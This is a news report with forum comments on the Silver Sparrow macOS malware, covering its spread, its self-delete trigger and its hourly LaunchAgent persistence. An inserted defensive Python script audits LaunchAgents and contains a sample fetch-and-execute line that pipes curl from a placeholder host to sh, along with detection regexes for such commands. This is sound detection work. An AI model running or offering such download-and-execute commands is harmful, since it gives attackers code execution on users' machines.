Over 30,000 Apple Macs have been infected with a high-stealth malware, and the company has no idea why

Authored by businessinsider.in and submitted by bartturner

San Francisco: security researchers have discovered a piece of malware on nearly 30,000 Macs, and they have no idea what it is for or how this virus is going to infect the devices. The malware, named 'Silver Sparrow', comes with a mechanism to self-destruct, a capability that is typically reserved for high-stealth operations.

"So far, though, there are no signs the self-destruct feature has been used, raising the question of why the mechanism exists," Ars Technica first reported about the presence of the malware, citing security researchers. The lack of a final payload suggests that the malware may spring into action at any time.

The malware has been found in 153 countries, with heavy detection reported in the US, the UK, Canada, France and

Silver Sparrow is an activity cluster that includes a binary compiled to run on Apple's new M1 chips but lacks one very important feature: a payload. "Though we haven't observed Silver Sparrow delivering additional malicious payloads yet, its forward-looking M1 chip compatibility, global reach, relatively high infection rate, and operational maturity suggest Silver Sparrow is a reasonably serious threat," according to researchers from cyber security firm Red Canary. The malware is uniquely positioned to deliver a potentially impactful payload at a moment's notice.

Silver Sparrow comes in two versions: one with a binary in mach-object (Mach-O) format compiled for x86_64 processors, and the other a Mach-O binary for the M1. Researchers have earlier warned that Apple's transition from Intel to its own M1 silicon may make it easy for hackers to introduce malware.

"To me, the most notable [thing] is that it was found on almost 30K macOS endpoints... and these are only endpoints the ... can see, so the number is likely way higher," said Patrick Wardle, a macOS security expert.

IAMA-Dragon-AMA on February 22nd, 2021 at 19:10 UTC »

To give more information because this article is very lacking. From an analysis done by Red Canary the trojan appears to the user as update.pkg or updater.pkg and masquerades as a software update using malicious advertisements. The ad might say something like, "Cannot display this content as your version of xyz is out of date, click here to update." and then the user unwittingly downloads the malware onto their machine.

The reason it's considered "high stealth" is mainly because it doesn't include its final payload and contains the means to delete itself. If the malware detects a file called ~/Library/._insu it uninstalls itself automatically. This could have been a way for the attacker to prevent their own systems from being infected while testing, or it could be something core to the function of the malware which attempts to avoid infecting machines after it's already run its course. Either way, the fact that even when analyzing it there's no way to know what its end goal is, combined with its ability to delete itself, has led malware researchers to conclude it's attempting to conceal its actual malicious package. Hence the "high stealth" title. In terms of what it's doing on an actual machine, it's anything but stealthy and really uses a lot of well-known malware techniques, such as creating a LaunchAgent which will reliably start its process when the machine boots.

When on a machine it downloads a file from an AWS-hosted server every hour and then runs arbitrary shell code based on the contents. That means whatever commands the attackers put onto the server, all the infected machines will download and execute. The idea is that at some point in the future the malware will get a command telling it to download the actual payload and then execute it. For now, though, it's just waiting, and until the malware is activated and told to download the payload there's no way of knowing what its actual goal is. The reason this is considered somewhat noteworthy is because an updated version of it has been adapted for the M1 ARM64 architecture, which is still very young, making it one of very, very few pieces of malware which has actually been configured to run in that environment. The fact that the attackers saw fit to update support for the new architecture, combined with the distributed cloud approach to command and control and a few other novel features, has been enough to suggest they might be somewhat knowledgeable, and so the threat should be taken seriously.

There's really not much more to this than any other malware for macOS, and most articles are just capitalizing on the phrase "high stealth" as well as the mystery about what the final package will be for clicks, and then give no other information. The company "has no idea why" the malware is infecting people in the same way you "have no idea why" someone might be knocking on your front door with a gun. Sure, you don't know exactly what they're doing there, but it's not anything great and you could probably come up with a few good guesses that wouldn't be too far off the mark.
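The persistence pattern the comment above describes (a LaunchAgent that starts at boot, fires on a fixed interval, and runs a shell one-liner that fetches remote content and executes it) can be audited locally. The script below is an added defensive example, not code from the article, Red Canary or the commenter; the two plists in it are constructed for illustration and are not real Silver Sparrow artifacts, and the one-hour threshold and the curl/wget-pipe-to-shell regexes are heuristic assumptions.

```python
"""Flag LaunchAgent plists that combine launchd persistence with a
fetch-and-execute shell one-liner. Heuristic only: it reports the pattern,
not a specific malware family."""
import plistlib
import re
from pathlib import Path

MAX_INTERVAL = 3600                      # assumption: hourly or faster is beacon-like
SHELL_NAMES = {"sh", "bash", "zsh"}
FETCH_RE = re.compile(r"\b(curl|wget)\b")
EXEC_RE = re.compile(r"\|\s*(sh|bash|zsh)\b|\beval\b|\$\(")

def assess_agent(plist_bytes: bytes) -> dict:
    """Return {'label', 'suspicious', 'reasons'} for one LaunchAgent plist."""
    data = plistlib.loads(plist_bytes)
    args = data.get("ProgramArguments") or []
    reasons = []
    # Persistence: launchd (re)starts the job at login and on a fixed interval.
    if data.get("RunAtLoad"):
        reasons.append("RunAtLoad")
    interval = data.get("StartInterval")
    if isinstance(interval, int) and 0 < interval <= MAX_INTERVAL:
        reasons.append(f"StartInterval={interval}s")
    # Fetch-and-execute: a `sh -c '... curl ... | sh'` style one-liner.
    is_shell = bool(args) and Path(args[0]).name in SHELL_NAMES and "-c" in args
    cmd = " ".join(args)
    fetches = is_shell and bool(FETCH_RE.search(cmd))
    executes = is_shell and bool(EXEC_RE.search(cmd))
    if fetches and executes:
        reasons.append("shell -c downloads and executes remote content")
    return {"label": data.get("Label", "?"),
            "suspicious": fetches and executes, "reasons": reasons}

def scan_agents(agents_dir: str) -> list:
    """Assess every .plist in a LaunchAgents directory (e.g. ~/Library/LaunchAgents)."""
    return [assess_agent(p.read_bytes()) for p in sorted(Path(agents_dir).glob("*.plist"))]

# Constructed samples: a benign local job and a beacon-like fetch-and-execute job.
BENIGN = plistlib.dumps({"Label": "com.example.backup", "RunAtLoad": True,
                         "StartInterval": 3600,
                         "ProgramArguments": ["/usr/local/bin/backup.sh"]})
BEACON = plistlib.dumps({"Label": "example.updater", "RunAtLoad": True,
                         "StartInterval": 3600,
                         "ProgramArguments": ["/bin/sh", "-c",
                             "curl -s https://example.invalid/tasks | sh"]})

if __name__ == "__main__":
    for sample in (BENIGN, BEACON):
        r = assess_agent(sample)
        print(r["label"], "SUSPICIOUS" if r["suspicious"] else "ok", r["reasons"])
```

Note that a matching agent is a lead to inspect, not proof of infection: the same interval and RunAtLoad settings appear in plenty of legitimate jobs, which is why only the fetch-plus-execute one-liner sets the suspicious flag.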

iGadget on February 22nd, 2021 at 16:37 UTC »

Article: "There is a widespread of malware on Macs."

Mac user: "So any further info would be nice... e.g.: How to find it?"

Article: ––– 😶

Holanz on February 22nd, 2021 at 14:40 UTC »

Ok so how do we fix this?